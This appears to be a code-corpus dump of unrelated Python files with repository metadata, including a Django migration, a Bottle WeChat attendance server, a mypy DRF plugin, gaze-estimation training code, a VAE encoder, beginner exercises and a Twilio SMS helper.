| null | null | null | null |
UTF-8
|
Python
| false
| false
| 580
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-04-26 16:16
from __future__ import unicode_literals
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: convert Course.prereq_courses to a Postgres ArrayField."""

    # Must run after the immediately preceding courses migration.
    dependencies = [
        ('courses', '0022_auto_20180426_1615'),
    ]

    operations = [
        migrations.AlterField(
            model_name='course',
            name='prereq_courses',
            # NOTE(review): default='NULL' is the literal string "NULL",
            # not SQL NULL — confirm this is intentional.
            field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=200), default='NULL', size=None),
        ),
    ]
|
[
"gautimeena456@gmail.com"
] |
gautimeena456@gmail.com
|
ba82f9b61b3eb06587fc5c2185adf9b9c041c8cf
|
bf33b8048d99eec4f693945d84f401ebe6083db2
|
/mybottle/sign/signup.py
|
d3f9f6c81e196105173160280a3cdb324ed8d510
|
[] |
no_license
|
yzhang3beatit/filesForServer
|
89f507937447511c12c6f9f35aa146b7619cbf42
|
eb7a551bc815c9f981ede01d058d9e0b6136971f
|
refs/heads/master
| 2021-01-19T05:10:50.982745
| 2016-07-21T06:28:50
| 2016-07-21T06:28:50
| 61,519,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,950
|
py
|
from bottle import route, run, request
import xml.etree.ElementTree as ET
# NOTE(review): time.clock was removed in Python 3.8 — this file presumably
# targets an older interpreter; confirm before upgrading.
from time import strftime, localtime, time, clock
from bisect import bisect_left
from xls.xls_record import get_records_from_xls, write_to_excel

# Scratch files used when dumping raw / decoded copies of incoming messages
# (the dump calls below are currently commented out).
mem_dir = '/home/y184zhan/tmp/'
readable = mem_dir+'xml_file.txt'
origin = mem_dir+'msg_file.txt'

# The keyword users must send to register attendance.
KEYWORD = '1python'


def sec2str(secs):
    # Epoch seconds -> local-time "YYYY-mm-dd HH:MM:SS" string.
    return strftime("%Y-%m-%d %H:%M:%S", localtime(secs))


def parseXML(recvmsg):
    """Parse an incoming WeChat push (XML bytes) into a flat {tag: text} dict.

    CreateTime is converted from epoch seconds to a readable timestamp.
    """
    # printToFile(recvmsg, origin, 'ba')
    _str = byte2str(recvmsg)
    # printToFile(_str, readable, 'a+')
    root = ET.fromstring(_str)
    msg = {}
    for child in root:
        if child.tag == 'CreateTime':
            msg[child.tag] = sec2str(int(child.text))
        else:
            msg[child.tag] = child.text
    return msg


# WeChat passive-reply XML template: to-user, from-user, timestamp, text body.
textTpl = '''<xml>
<ToUserName><![CDATA[%s]]></ToUserName>
<FromUserName><![CDATA[%s]]></FromUserName>
<CreateTime>%s</CreateTime>
<MsgType><![CDATA[text]]></MsgType>
<Content><![CDATA[%s]]></Content>
</xml>'''


def printToFile(msg, filepath, flag):
    # Write helper; flag is the open() mode (e.g. 'a+', 'ba').
    f = open(filepath, flag)
    f.write(msg)
    f.close()


def byte2str(utfByte):
    # Decode raw request bytes to text (default UTF-8).
    _str = utfByte.decode()
    # print(_str)
    return _str


@route('/', method='POST')
def index():
    """Bottle endpoint WeChat POSTs messages to; replies with sign-in XML."""
    start = clock()
    openid = request.query.openid
    # print("OPENID in FORMS:", openid)
    # for l in request.body:
    #     print(l)
    msg = parseXML(request.body.read())
    echostr = build_echostr(msg)
    end = clock()
    print('Running time: %fs' %(end - start))
    return echostr


# In-memory sign-in table and its sorted openid index (column 0),
# kept in lockstep by the update_data_* helpers below.
DATA = []
DATA_INDEX = []


def main():
    # Load the sign-in sheet and build the sorted openid index.
    global DATA
    global DATA_INDEX
    DATA = read_data_file()
    DATA_INDEX = [x[0] for x in DATA]


def read_data_file():
    # Read the 'Clear' sheet of the sign-in workbook into a list of rows.
    filename = './sign_record.xls'
    datalist = get_records_from_xls(filename, 'Clear')
    return datalist


def build_echostr(msg):
    """Route an incoming text through the sign-up/sign-in state machine and
    build the XML reply.

    Row layout (observed from the helpers): [openid, memo, timestamp, ?,
    name, nokia_id, ?].
    """
    content = msg['Content'].strip()
    welcome = u"Welcome to Coach Workroom"
    if content == "print" and msg['FromUserName'] == "oPZW5t7_QdCpwjFK092Bn-iywx6s":
        # Admin-only: list all registered names.
        welcome = u"Yes, Sir !\n"
        data_list = [x[4] for x in DATA]
        len_ = len(data_list) - 2
        names = ',\n'.join(data_list)
        welcome += str(len_) + '\n'
        welcome += names
    elif content == "save" and msg['FromUserName'] == "oPZW5t7_QdCpwjFK092Bn-iywx6s":
        # Admin-only: persist the in-memory table to disk.
        welcome = u"Yes, Sir !"
        write_to_excel('result.xls', 'SIGN', len(DATA), 7, None, DATA)
    elif content.lower() == 'update':
        # User wants to re-enter their details: clear name and Nokia ID.
        welcome = u"Please type in your ID\n(e.g. 10240148)"
        update_data_clear(msg['FromUserName'])
    elif KEYWORD in content:
        # Sign-in keyword received: record attendance (or start registration).
        user = update_data_sign(msg['FromUserName'], content, msg['CreateTime'])
        if user: # user[4] == name:
            if user[1]: # meno
                welcome = u"%s, you have signed!" %user[4]
            else:
                welcome = u"Welcome to sign-in: %s" %user[4]
        else:
            welcome = u"Please type in Nokia ID:\n(e.g. 10240148)"
    elif content.isdigit() and len(content) == 8:
        # Looks like a Nokia ID (8 digits): store it, then ask for the name.
        welcome = u"Please type in your name\n(e.g. ZhangYang):"
        update_data_nokiaid(msg['FromUserName'], content)
    elif is_name(content):
        # Looks like a name: store it, then ask for the sign-in keyword.
        welcome = u"Please type in keyword to sign-in"
        update_data_name(msg['FromUserName'], content)
    else:
        # Anything else: answer according to how far the user got.
        user = update_data_find(msg['FromUserName'])
        if user: # user[4] == name
            if not user[4]:
                welcome = u"Please type in your name\n(e.g. ZhangYang):"
            elif user[1]: # user[1] == memo
                welcome = u"%s, you have signed!" % user[4]
            else:
                welcome = u"%s, please type in keyword to sign" % user[4]
        else:
            welcome = u"Please sign up with your:\nNokiaID (e.g. 12345678)"
    echostr = textTpl % (msg['FromUserName'], msg['ToUserName'], str(int(time())),
                         welcome)
    # #print(DATA)
    return echostr


def is_name(str_):
    # Heuristic: a name is fully alphabetic and starts with a capital letter.
    return str_.isalpha() and str_[0].isupper()


def update_data_clear(openid):
    # Reset the stored name (col 4) and Nokia ID (col 5) for this openid.
    index = bisect_left(DATA_INDEX, openid)
    if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
        DATA[index][4] = ''
        DATA[index][5] = ''


def update_data_find(openid):
    # Return the row for openid, or None when not registered.
    index = bisect_left(DATA_INDEX, openid)
    if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
        return DATA[index]


def update_data_sign(openid, meno, timestamp):
    """Record a sign-in (memo + timestamp) for openid.

    Returns the updated row, or None after inserting a stub row when the
    openid was unknown (registration continues in build_echostr).
    """
    global DATA
    global DATA_INDEX
    index = bisect_left(DATA_INDEX, openid)
    if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
        # print('found openid for ', meno)
        DATA[index][1] = meno
        DATA[index][2] = timestamp
        return DATA[index]
    else:
        new = [openid, meno, '', '', '', '', '']
        DATA.insert(index, new)
        DATA_INDEX.insert(index, openid)
        return


def update_data_name(openid, name):
    # Store the display name (col 4) for openid; insert a stub row if new.
    # An existing non-blank name is never overwritten here (use 'update').
    global DATA
    global DATA_INDEX
    index = bisect_left(DATA_INDEX, openid)
    if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
        # print('found openid for ', name)
        if not DATA[index][4].strip():
            DATA[index][4] = name
    else:
        new = [openid, '', '', '', name, '', ' ']
        DATA.insert(index, new)
        DATA_INDEX.insert(index, openid)


def update_data_nokiaid(openid, nokiaid):
    # Store the Nokia ID (col 5) for openid; insert a stub row if new.
    global DATA
    global DATA_INDEX
    index = bisect_left(DATA_INDEX, openid)
    if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
        # print('found openid for ', nokiaid)
        if not DATA[index][5].strip():
            DATA[index][5] = nokiaid
    else:
        new = [openid, '', '', '', '', nokiaid,' ']
        DATA.insert(index, new)
        DATA_INDEX.insert(index, openid)


'''
user = {'ID':msg['FromUserName'], 'Memo': msg['Content'], 'Name':msg['name'],
        'Nokia ID':msg['nokiaid'], 'Department':msg['mdep'],
        'TimeStamp':msg['CreateTime'], 'Sign':msg['Content']}
'''

if __name__ == "__main__":
    main()
    run(host='0.0.0.0', port=80)
|
[
"yang.2.zhang@nokia.com"
] |
yang.2.zhang@nokia.com
|
7baa26a26fc7ed616e1f4cfa37d283d39e72ebf3
|
bbdd7f44884844cd0f7332d63945852dc2b53083
|
/mypy_drf_plugin/transformers/fields.py
|
f4f8a10b2f9cc833f0b0e6cedc3fe13340f2fdf9
|
[
"MIT"
] |
permissive
|
private-forks/djangorestframework-stubs
|
e258e1dfc2af80fdf93322338ea3ce5452087e2d
|
18427718c913f3d23ef7a4636c8205df42999cf2
|
refs/heads/master
| 2020-04-25T09:11:04.067894
| 2019-02-24T22:25:03
| 2019-02-24T22:25:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,241
|
py
|
from mypy.nodes import TypeInfo, Var
from mypy.plugin import FunctionContext
from mypy.types import AnyType, Instance, Type, TypeOfAny
from mypy_django_plugin import helpers
def get_private_descriptor_type(type_info: TypeInfo, private_field_name: str, is_nullable: bool) -> Type:
    """Resolve the declared type of a private descriptor attribute.

    Falls back to an unannotated Any when the attribute is missing or is
    not a plain Var; wraps the type in Optional when is_nullable is set.
    """
    fallback = AnyType(TypeOfAny.unannotated)
    if not type_info.has_readable_member(private_field_name):
        return fallback
    symbol = type_info.get(private_field_name).node
    if not isinstance(symbol, Var):
        return fallback
    resolved = symbol.type
    if is_nullable:
        resolved = helpers.make_optional(resolved)
    return resolved
def fill_parameters_of_descriptor_methods_from_private_attributes(ctx: FunctionContext) -> Type:
    """Reparametrize a DRF field instance with its private getter type.

    Reads the '_pyi_private_get_type' attribute of the returned instance's
    class, made Optional when allow_null=True was passed to the field.
    """
    inferred = ctx.default_return_type
    if not isinstance(inferred, Instance):
        return inferred
    allow_null = bool(helpers.parse_bool(helpers.get_argument_by_name(ctx, 'allow_null')))
    getter_type = get_private_descriptor_type(inferred.type, '_pyi_private_get_type',
                                              is_nullable=allow_null)
    return helpers.reparametrize_instance(inferred, [getter_type])
|
[
"maxim.kurnikov@gmail.com"
] |
maxim.kurnikov@gmail.com
|
3e8e2a961f16337985eed5135e0657e6cf615172
|
ccc688aeae19f19e2167c3e730025a1b43b7f717
|
/gazefollowing/training/train_gazenet.py
|
618fed1be3889333ff7c1655a6b9968c0a97ea7b
|
[] |
no_license
|
PrimeshShamilka/GOO
|
32cddb1c3b4ad83ec901f1e61e0defe00205991f
|
6a374cceed59cb6925099382f3f56aef52820d07
|
refs/heads/main
| 2023-09-01T05:47:59.185702
| 2021-10-13T19:07:01
| 2021-10-13T19:07:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,198
|
py
|
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import numpy as np
import cv2
from sklearn.metrics import roc_auc_score
from tqdm import tqdm
def F_loss(direction, predict_heatmap, eye_position, gt_position, gt_heatmap):
    """Return (heatmap BCE loss, mean angular loss) for a batch.

    The angular term is the mean of 1 - cos(angle) between the predicted
    gaze direction and the true direction (gaze point minus eye point).
    """
    bce_loss = nn.BCELoss()(predict_heatmap, gt_heatmap)

    true_direction = gt_position - eye_position
    cosine = nn.CosineSimilarity()(direction, true_direction)
    angular_loss = torch.mean(1 - cosine)

    return bce_loss, angular_loss
class GazeOptimizer():
    """Three-stage optimizer schedule for the gaze network.

    Stage 1 (epoch < 7): train the head pathway (face net, face processing,
    eye-position transform, fusion). Stage 2 (epoch < 15): train the FPN
    heatmap branch. Stage 3: fine-tune everything at 10x lower LR.
    Each stage gets its own Adam optimizer with a StepLR decay (x0.1 / 5 steps).

    NOTE: `net` is accessed through `net.module`, so it is expected to be
    wrapped in nn.DataParallel.
    """

    def __init__(self, net, initial_lr):

        self.optimizer_s1 = optim.Adam([{'params': net.module.face_net.parameters(),
                                         'initial_lr': initial_lr},
                                        {'params': net.module.face_process.parameters(),
                                         'initial_lr': initial_lr},
                                        {'params': net.module.eye_position_transform.parameters(),
                                         'initial_lr': initial_lr},
                                        {'params': net.module.fusion.parameters(),
                                         'initial_lr': initial_lr}],
                                       lr=initial_lr, weight_decay=0.0001)
        self.optimizer_s2 = optim.Adam([{'params': net.module.fpn_net.parameters(),
                                         'initial_lr': initial_lr}],
                                       lr=initial_lr, weight_decay=0.0001)
        # Stage 3 trains all parameters at a reduced learning rate.
        self.optimizer_s3 = optim.Adam([{'params': net.parameters(), 'initial_lr': initial_lr}],
                                       lr=initial_lr*0.1, weight_decay=0.0001)

        self.lr_scheduler_s1 = optim.lr_scheduler.StepLR(self.optimizer_s1, step_size=5, gamma=0.1, last_epoch=-1)
        self.lr_scheduler_s2 = optim.lr_scheduler.StepLR(self.optimizer_s2, step_size=5, gamma=0.1, last_epoch=-1)
        self.lr_scheduler_s3 = optim.lr_scheduler.StepLR(self.optimizer_s3, step_size=5, gamma=0.1, last_epoch=-1)

        self.optimizer = self.optimizer_s1

    def getOptimizer(self, epoch):
        """Select the stage optimizer for this epoch, step its LR schedule,
        and return it. Epoch thresholds mirror the loss schedule in train()."""

        if epoch < 7:
            lr_scheduler = self.lr_scheduler_s1
            self.optimizer = self.optimizer_s1
        elif epoch < 15:
            lr_scheduler = self.lr_scheduler_s2
            self.optimizer = self.optimizer_s2
        else:
            lr_scheduler = self.lr_scheduler_s3
            self.optimizer = self.optimizer_s3

        lr_scheduler.step()

        return self.optimizer
def train(net, train_dataloader, optimizer, epoch, logger):
    """Run one training epoch; returns the tail of the running-loss log.

    The loss mixes the two F_loss terms by stage: epoch 0 uses only the
    angular loss, epochs 7-14 only the heatmap loss, all others the sum.
    Requires CUDA (all batch tensors are moved to the GPU).
    """

    running_loss = []

    for i, data in tqdm(enumerate(train_dataloader), total=len(train_dataloader)):

        image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
            data['image'], data['face_image'], data['gaze_field'], data['eye_position'], data['gt_position'], data['gt_heatmap']
        image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
            map(lambda x: Variable(x.cuda()), [image, face_image, gaze_field, eye_position, gt_position, gt_heatmap])

        optimizer.zero_grad()

        direction, predict_heatmap = net([image, face_image, gaze_field, eye_position])

        heatmap_loss, m_angle_loss = \
            F_loss(direction, predict_heatmap, eye_position, gt_position, gt_heatmap)

        # Stage-dependent loss selection (matches GazeOptimizer's stages).
        if epoch == 0:
            loss = m_angle_loss
        elif epoch >= 7 and epoch <= 14:
            loss = heatmap_loss
        else:
            loss = m_angle_loss + heatmap_loss

        loss.backward()
        optimizer.step()

        running_loss.append([heatmap_loss.item(),
                             m_angle_loss.item(), loss.item()])
        # Log and reset the running average every 100 batches.
        if i % 100 == 99:
            logger.info('%s'%(str(np.mean(running_loss, axis=0))))
            running_loss = []

    return running_loss
def test(net, test_data_loader, logger, save_output=False):
    """Evaluate the gaze network; returns [AUC, mean L2 dist, mean angle err].

    The predicted gaze point is the argmax of the 56x56 heatmap; AUC is
    computed on 5x5 downsampled heatmaps against a one-hot ground truth.
    Requires CUDA. Optionally saves all predicted points to predictions.npz.
    """
    net.eval()
    total_loss = []
    total_error = []
    info_list = []
    heatmaps = []

    all_gazepoints = []
    all_predmap = []
    all_gtmap = []

    with torch.no_grad():
        for data in tqdm(test_data_loader, total=len(test_data_loader)):
            image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
                data['image'], data['face_image'], data['gaze_field'], data['eye_position'], data['gt_position'], data['gt_heatmap']
            image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
                map(lambda x: Variable(x.cuda()), [image, face_image, gaze_field, eye_position, gt_position, gt_heatmap])

            direction, predict_heatmap = net([image, face_image, gaze_field, eye_position])
            #curr_batch_size = predict_heatmap.shape[0]
            #predict_heatmap = torch.rand(curr_batch_size, 1, 56, 56).cuda()

            heatmap_loss, m_angle_loss = \
                F_loss(direction, predict_heatmap, eye_position, gt_position, gt_heatmap)

            loss = heatmap_loss + m_angle_loss

            total_loss.append([heatmap_loss.item(),
                               m_angle_loss.item(), loss.item()])
            #logger.info('loss: %.5lf, %.5lf, %.5lf'%( \
            #    heatmap_loss.item(), m_angle_loss.item(), loss.item()))

            middle_output = direction.cpu().data.numpy()
            final_output = predict_heatmap.cpu().data.numpy()
            target = gt_position.cpu().data.numpy()
            eye_position = eye_position.cpu().data.numpy()
            predict_heatmap = predict_heatmap.cpu().data.numpy()

            for m_direction, f_point, gt_point, eye_point, heatmap in \
                    zip(middle_output, final_output, target, eye_position, predict_heatmap):
                # Predicted gaze point = heatmap argmax, normalized to [0, 1).
                f_point = f_point.reshape([224 // 4, 224 // 4])
                heatmaps.append(f_point)
                h_index, w_index = np.unravel_index(f_point.argmax(), f_point.shape)
                f_point = np.array([w_index / 56., h_index / 56.])

                f_error = f_point - gt_point
                f_dist = np.sqrt(f_error[0] ** 2 + f_error[1] ** 2)

                # angle error of both the direct (m_) and heatmap-derived (f_) directions
                f_direction = f_point - eye_point
                gt_direction = gt_point - eye_point

                norm_m = (m_direction[0] **2 + m_direction[1] ** 2 ) ** 0.5
                norm_f = (f_direction[0] **2 + f_direction[1] ** 2 ) ** 0.5
                norm_gt = (gt_direction[0] **2 + gt_direction[1] ** 2 ) ** 0.5

                # Cosine similarities are clamped to [-1, 1] before arccos.
                m_cos_sim = (m_direction[0]*gt_direction[0] + m_direction[1]*gt_direction[1]) / \
                            (norm_gt * norm_m + 1e-6)
                m_cos_sim = np.maximum(np.minimum(m_cos_sim, 1.0), -1.0)
                m_angle = np.arccos(m_cos_sim) * 180 / np.pi

                f_cos_sim = (f_direction[0]*gt_direction[0] + f_direction[1]*gt_direction[1]) / \
                            (norm_gt * norm_f + 1e-6)
                f_cos_sim = np.maximum(np.minimum(f_cos_sim, 1.0), -1.0)
                f_angle = np.arccos(f_cos_sim) * 180 / np.pi

                #AUC on a coarse 5x5 grid: one-hot ground-truth cell vs heatmap
                heatmap = np.squeeze(heatmap)
                heatmap = cv2.resize(heatmap, (5, 5))
                gt_heatmap = np.zeros((5, 5))
                x, y = list(map(int, gt_point * 5))
                gt_heatmap[y, x] = 1.0

                all_gazepoints.append(f_point)
                all_predmap.append(heatmap)
                all_gtmap.append(gt_heatmap)
                #score = roc_auc_score(gt_heatmap.reshape([-1]).astype(np.int32), heatmap.reshape([-1]))

                total_error.append([f_dist, f_angle])
                info_list.append(list(f_point))

    info_list = np.array(info_list)

    l2, ang = np.mean(np.array(total_error), axis=0)

    all_gazepoints = np.vstack(all_gazepoints)
    all_predmap = np.stack(all_predmap).reshape([-1])
    all_gtmap = np.stack(all_gtmap).reshape([-1])
    auc = roc_auc_score(all_gtmap, all_predmap)
    if save_output:
        np.savez('predictions.npz', gazepoints=all_gazepoints)

    #logger.info('average loss : %s'%str(np.mean(np.array(total_loss), axis=0)))
    logger.info('average error: %s'%str([auc, l2, ang]))

    net.train()

    return [auc, l2, ang]
|
[
"henri.tomas@eee.upd.edu.ph"
] |
henri.tomas@eee.upd.edu.ph
|
3bd778d2775c1fc9582037bb95bba1c5063b9273
|
5414512230d3fb1b6ba70d9f1eabb2bfaae6f337
|
/List_Array.py
|
702a09f18efc8a9dfd700bebedcdb4e42f672300
|
[] |
no_license
|
offenanil/dunder_method
|
950968d7eae9cf3d5714130f34997824a1e9b473
|
6956774f0aa06b7722431fce0dfebef595c01c97
|
refs/heads/main
| 2023-07-03T12:25:19.200499
| 2021-08-06T02:12:20
| 2021-08-06T02:12:20
| 392,276,739
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 399
|
py
|
# Demo: basic list indexing in Python.

users = ['ram', 'sita', 'gita', 'hari']

# Positive indices count from 0 at the front; negative indices count
# from -1 at the back, so one element can be addressed from either end.
print(users)

# 'gita' is reachable as index 2 (from the front) or -2 (from the back),
# so the next two prints produce the same output.
third_user = users[2]
print(third_user)
print(users[-2])
|
[
"offenanil@gmail.com"
] |
offenanil@gmail.com
|
ab2e70e575b38380a237025bcdbb447ce34fba5a
|
88eb514f6934c8b3e0a86f852f4202325a0546b7
|
/recepis/migrations/0002_rename_receitas_receita.py
|
a688a952255112952123cf68f9ae2fd4c30b680e
|
[] |
no_license
|
AllysonAbreu/projeto-pw
|
2859a90c4fbb75e26397e068327b1e7ad791f2a1
|
5e85935ccc6329d1234081541201cc6f0287741f
|
refs/heads/main
| 2023-09-01T05:02:31.127160
| 2021-09-16T23:08:58
| 2021-09-16T23:08:58
| 402,399,271
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 322
|
py
|
# Generated by Django 3.2.7 on 2021-09-02 17:38
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: rename model Receitas to Receita."""

    # Must run after the initial recepis migration.
    dependencies = [
        ('recepis', '0001_initial'),
    ]

    operations = [
        migrations.RenameModel(
            old_name='Receitas',
            new_name='Receita',
        ),
    ]
|
[
"Aoa3698741@_"
] |
Aoa3698741@_
|
5b98146395ad29c6511925bbc47a3402f1251fa2
|
1e168ced1a4bdb53967021e082b98027aea9d38a
|
/1.알고리즘정리/정렬/삽입정렬.py
|
6e0f94afc79ed7d33b51a468d14c6182e85e3d68
|
[] |
no_license
|
vvspearlvvs/CodingTest
|
3ebf921308570ac11eb87e6660048ccfcaf90ce4
|
fc61b71d955f73ef8710f792d008bc671614ef7a
|
refs/heads/main
| 2023-07-13T15:57:11.312519
| 2021-08-25T02:15:28
| 2021-08-25T02:15:28
| 354,232,513
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 282
|
py
|
# Insertion sort: grow a sorted prefix, sinking each new element leftward.
arr = [7, 5, 9, 0, 3, 1, 6, 2, 4, 8]

for end in range(len(arr)):
    pos = end
    # Shift the new element one slot left while it is smaller than its neighbour.
    while pos > 0 and arr[pos] < arr[pos - 1]:
        arr[pos], arr[pos - 1] = arr[pos - 1], arr[pos]
        pos -= 1
    print(arr)  # state after inserting arr[end]
print("최종")
print(arr)
|
[
"gg66477@gmail.com"
] |
gg66477@gmail.com
|
8b0bcb3eb0687fab864e824994d9b70939870f5d
|
5bcee9248d0bdebb134c61b4d0a3f3113337a569
|
/lesson_0902/01_lists.py
|
816ff09874e0073dca2b2f3d1f0fd9d842bcbb7b
|
[] |
no_license
|
100ballovby/6V_Lesson
|
c2edbc652ea2ebec07eeed60060c16ae4b4792e4
|
4b6dfda323a628558bd63bd5569960004fc335dd
|
refs/heads/master
| 2023-05-08T07:49:14.569854
| 2021-05-25T06:40:53
| 2021-05-25T06:40:53
| 330,888,686
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,044
|
py
|
'''
A list is an ordered data structure enclosed in square brackets, with
its elements separated by commas.

To create a list, choose a name for it, use the assignment operator (=)
and open square brackets:

my_list = [1, 26, 15, 5.6, 'hello, Andrey']
'''
cars = ['audi', 'mercedes', 'toyota', 'skoda', 'seat']

# Print the whole list.
print(cars)

# Print 'toyota' by its index; index -1 addresses the last element.
print(cars[2])
print(cars[-1])

import random  # the random module provides pseudo-random helpers

# randint(a, b) returns a random integer in the inclusive range [a, b].
print('My first car was', cars[random.randint(0, 4)])
print(random.randint(-100, 100))
|
[
"greatraksin@icloud.com"
] |
greatraksin@icloud.com
|
2abb9c8ae38feb38f85cf81f93563ee9f1f3914a
|
5cc9623db04e92a9ddee09c27a168d04c39b6e19
|
/model/encoder.py
|
beb00c3109d7b79d9fd4e96c2b9b261a3958fa8f
|
[
"MIT"
] |
permissive
|
FengHZ/VAEGAN
|
2e4d8c65d39e0b79a983b1be45c29987ecfc3f3e
|
0c113dc973b19fe212aca07a4a898fa919346d41
|
refs/heads/master
| 2020-05-22T04:52:42.156153
| 2019-05-12T07:30:09
| 2019-05-12T07:30:09
| 186,224,301
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,451
|
py
|
from torch import nn
import torch
class Encoder(nn.Module):
    """DCGAN-style convolutional VAE encoder.

    Maps a (N, num_channel, 64, 64) batch to the parameters of a diagonal
    Gaussian posterior and draws one reparameterized sample.

    forward() returns:
        features  -- (N, num_feature*8, 4, 4) conv feature map
        mu        -- (N, latent_dim, 1, 1) posterior mean
        log_sigma -- (N, latent_dim, 1, 1) log std-dev
        sigma     -- exp(log_sigma)
        z_sample  -- mu + eps * sigma with eps ~ N(0, I)
    """

    def __init__(self, num_channel=3, num_feature=64, latent_dim=100, data_parallel=True):
        super(Encoder, self).__init__()
        features = nn.Sequential(
            # input is (num_channel) x 64 x 64
            nn.Conv2d(num_channel, num_feature, 4, 2, 1, bias=False),
            nn.LeakyReLU(0.2, inplace=True),
            # state size. (num_feature) x 32 x 32
            nn.Conv2d(num_feature, num_feature * 2, 4, 2, 1, bias=False),
            nn.BatchNorm2d(num_feature * 2),
            nn.LeakyReLU(0.2, inplace=True),
            # state size. (num_feature*2) x 16 x 16
            nn.Conv2d(num_feature * 2, num_feature * 4, 4, 2, 1, bias=False),
            nn.BatchNorm2d(num_feature * 4),
            nn.LeakyReLU(0.2, inplace=True),
            # state size. (num_feature*4) x 8 x 8
            nn.Conv2d(num_feature * 4, num_feature * 8, 4, 2, 1, bias=False),
            nn.BatchNorm2d(num_feature * 8),
            nn.LeakyReLU(0.2, inplace=True),
        )
        # Two independent 1x1-output conv heads: posterior mean and log std-dev.
        z_mean_map = nn.Sequential(
            # state size. (num_feature*8) x 4 x 4
            nn.Conv2d(num_feature * 8, latent_dim, 4, 1, 0, bias=True),
        )
        z_log_sigma_map = nn.Sequential(
            # state size. (num_feature*8) x 4 x 4
            nn.Conv2d(num_feature * 8, latent_dim, 4, 1, 0, bias=True),
        )
        if data_parallel:
            self.features = nn.DataParallel(features)
            self.z_mean_map = nn.DataParallel(z_mean_map)
            self.z_log_sigma_map = nn.DataParallel(z_log_sigma_map)
        else:
            self.features = features
            self.z_mean_map = z_mean_map
            self.z_log_sigma_map = z_log_sigma_map
        # NOTE(review): nn.Sequential produces parameter names like
        # 'features.0.weight', which contain neither 'conv' nor 'norm', so
        # none of the branches below appear to ever match and the intended
        # Xavier/BatchNorm init is likely never applied. Left unchanged to
        # preserve behavior; match on module types if the init is wanted.
        for name, param in self.named_parameters():
            if 'conv' in name and 'weight' in name:
                nn.init.xavier_normal_(param.data)
            elif 'norm' in name and 'weight' in name:
                param.data.fill_(1)
            elif 'norm' in name and 'bias' in name:
                param.data.fill_(0)

    def forward(self, input):
        features = self.features(input)
        mu = self.z_mean_map(features)
        # BUG FIX: log_sigma was previously computed with z_mean_map as well,
        # which left z_log_sigma_map unused and forced log_sigma == mu.
        log_sigma = self.z_log_sigma_map(features)
        sigma = torch.exp(log_sigma)
        # Reparameterization trick: sample eps on the same device as mu.
        std_z = torch.randn(mu.size())
        if mu.is_cuda:
            std_z = std_z.cuda()
        z_sample = mu + std_z * sigma
        return features, mu, log_sigma, sigma, z_sample
|
[
"fenghz@zju.edu.cn"
] |
fenghz@zju.edu.cn
|
8577baebc54712a01aff72b610290ff2ca7776d9
|
cd8d6d20351b86b6e2b28500467d8999f9fa4439
|
/src/image_scraping_step_3/alert_program.py
|
83a08327cd98f3738516d57a4b84849217aa1d3c
|
[
"MIT"
] |
permissive
|
mhmulder/image_captioning
|
bf706f574ba12e3daa5b9b8bfdf0d733233abb7d
|
ed22a3b4948d1ce5e8db580433d58945a2a5f010
|
refs/heads/master
| 2021-09-05T19:46:12.694992
| 2018-01-30T16:46:29
| 2018-01-30T16:46:29
| 115,772,652
| 1
| 1
| null | 2018-01-30T16:46:30
| 2017-12-30T04:07:16
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 794
|
py
|
from twilio.rest import Client
import os
accountSID = os.environ["TWILIO_SID"]
authToken = os.environ["TWILIO_TOKEN"]
myTwilioNumber = os.environ["TWILIO_NUMBER"]
myCellPhone = os.environ["my_number"]
def send_end_alert(project_name, body='Default', accountSID=accountSID,
                   authToken=authToken, myTwilioNumber=myTwilioNumber,
                   myCellPhone=myCellPhone):
    """Send an SMS via Twilio announcing that *project_name* has finished.

    :param project_name: name interpolated into the default message body
    :param body: custom message text; the sentinel 'Default' selects the
        standard completion message
    :param accountSID/authToken: Twilio credentials (default: env-derived)
    :param myTwilioNumber: sender number (default: env-derived)
    :param myCellPhone: recipient number (default: env-derived)
    :return: the Twilio message object returned by messages.create
    """
    # BUG FIX: the parameter was misspelled `myTeilioNumber` and the body
    # read the module-level global instead, so a caller-supplied sender
    # number was silently ignored. Also replaced the no-op
    # `if body != 'Default': body = body` with the inverted check.
    if body == 'Default':
        body = 'Your project, {}, has completed!'.format(project_name)
    twilioCli = Client(accountSID, authToken)
    message = twilioCli.messages.create(body=body,
                                        from_=myTwilioNumber,
                                        to=myCellPhone)
    return message
if __name__ == '__main__':
send_end_alert('test')
|
[
"michaelmulder@Michaels-MacBook-Pro.local"
] |
michaelmulder@Michaels-MacBook-Pro.local
|
7c7062d3cb3ee5ceef84ad4f204bfa6737215dd7
|
15ae6eb98806ae70ac49b0a0214fab4c3d15e073
|
/数据科学基础/数据科学基础(/st_python/2017期末考试/大一班/ExhaustEmission.py
|
92ba2236c8a3e611613b64664a043bdf10b7d459
|
[] |
no_license
|
huyuework/professional-class
|
b423c42d401d9731f498e1c7fd0da2ebc819ba68
|
e1717c32370b7cc9d82ca7c098e57104b04af9c6
|
refs/heads/master
| 2023-08-21T21:38:32.333392
| 2021-10-06T07:56:08
| 2021-10-06T07:56:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,239
|
py
|
# -*- coding:utf-8 -*-
'''
